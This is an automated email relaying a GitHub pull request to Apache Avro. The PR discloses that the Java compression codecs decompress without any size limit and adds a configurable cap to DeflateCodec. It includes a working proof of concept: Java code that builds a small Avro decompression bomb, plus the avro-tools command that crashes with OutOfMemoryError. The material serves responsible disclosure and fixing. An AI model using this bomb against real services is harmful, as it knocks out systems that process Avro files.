OwenSanzas opened a new pull request, #3625:
URL: https://github.com/apache/avro/pull/3625
## Summary
All Avro Java compression codecs (Deflate, Zstandard, XZ, BZip2, Snappy)
decompress data without any size limit, allowing an attacker to craft a small
Avro file (~50KB) that expands to an extremely large size (~50MB+), causing
`OutOfMemoryError` and crashing the JVM.
## Root Cause
The codec implementations decompress data into unbounded
`ByteArrayOutputStream` without checking the output size:
### Vulnerable Code (DeflateCodec.java:83)
```java
@Override
public ByteBuffer decompress(ByteBuffer data) throws IOException {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
// NO SIZE LIMIT - decompresses until OOM!
try (InflaterOutputStream ios = new InflaterOutputStream(baos, inflater)) {
ios.write(data.array(), computeOffset(data), data.remaining());
}
return ByteBuffer.wrap(baos.toByteArray());
}
```
## PoC
### Trigger file
A crafted `poc.avro` file (49KB) that decompresses to 50MB:
- Schema:
`{"type":"record","name":"Payload","fields":[{"name":"data","type":"bytes"}]}`
- Codec: deflate (level 9)
- Payload: 50MB of zeros (compresses ~1000:1)
### How to generate poc.avro
```java
// CreatePoC.java
import org.apache.avro.Schema;
import org.apache.avro.file.CodecFactory;
import org.apache.avro.file.DataFileWriter;
import org.apache.avro.generic.GenericData;
import org.apache.avro.generic.GenericDatumWriter;
import org.apache.avro.generic.GenericRecord;
import java.io.File;
import java.nio.ByteBuffer;
public class CreatePoC {
public static void main(String[] args) throws Exception {
String SCHEMA =
"{\"type\":\"record\",\"name\":\"Payload\",\"fields\":[" +
"{\"name\":\"data\",\"type\":\"bytes\"}]}";
Schema schema = new Schema.Parser().parse(SCHEMA);
DataFileWriter<GenericRecord> writer = new DataFileWriter<>(new
GenericDatumWriter<>(schema));
writer.setCodec(CodecFactory.deflateCodec(9)); // Max compression
writer.create(schema, new File("poc.avro"));
// 50MB of zeros - compresses ~1000:1
byte[] payload = new byte[50 * 1024 * 1024];
GenericRecord record = new GenericData.Record(schema);
record.put("data", ByteBuffer.wrap(payload));
writer.append(record);
writer.close();
}
}
```
## Trigger Method: Official avro-tools CLI
```bash
java -Xmx32m -jar avro-tools-1.13.0-SNAPSHOT.jar tojson poc.avro
```
**Output:**
```
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
at java.base/java.util.Arrays.copyOf(Arrays.java:3541)
at
java.base/java.io.ByteArrayOutputStream.ensureCapacity(ByteArrayOutputStream.java:100)
at
java.base/java.io.ByteArrayOutputStream.write(ByteArrayOutputStream.java:132)
at
java.base/java.util.zip.InflaterOutputStream.write(InflaterOutputStream.java:249)
at org.apache.avro.file.DeflateCodec.decompress(DeflateCodec.java:83)
at
org.apache.avro.file.DataFileStream$DataBlock.decompressUsing(DataFileStream.java:381)
at org.apache.avro.file.DataFileStream.hasNext(DataFileStream.java:227)
at org.apache.avro.tool.DataFileReadTool.run(DataFileReadTool.java:96)
at org.apache.avro.tool.Main.run(Main.java:67)
at org.apache.avro.tool.Main.main(Main.java:56)
```
**Other affected avro-tools commands:** `cat`, `count`, `getmeta`,
`getschema`, `concat`, `recodec`
## Impact
| Aspect | Details |
|--------|---------|
| **Type** | Denial of Service (DoS) |
| **Severity** | High |
| **Attack Vector** | Malicious Avro file |
| **Affected Components** | `DataFileReader`, `DataFileStream`, `avro-tools`
|
| **Affected Codecs** | Deflate, Zstandard, XZ, BZip2, Snappy |
| **CWE** | CWE-409 (Improper Handling of Highly Compressed Data) |
## This PR
This PR adds a maximum decompression size limit (default 200MB) to
`DeflateCodec.java`. The limit can be configured via system property
`org.apache.avro.limits.decompress.maxLength`.
**Note:** Other codecs (`ZstandardCodec`, `XZCodec`, `BZip2Codec`,
`SnappyCodec`) have the same issue. We can discuss the fix for those in
follow-up.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]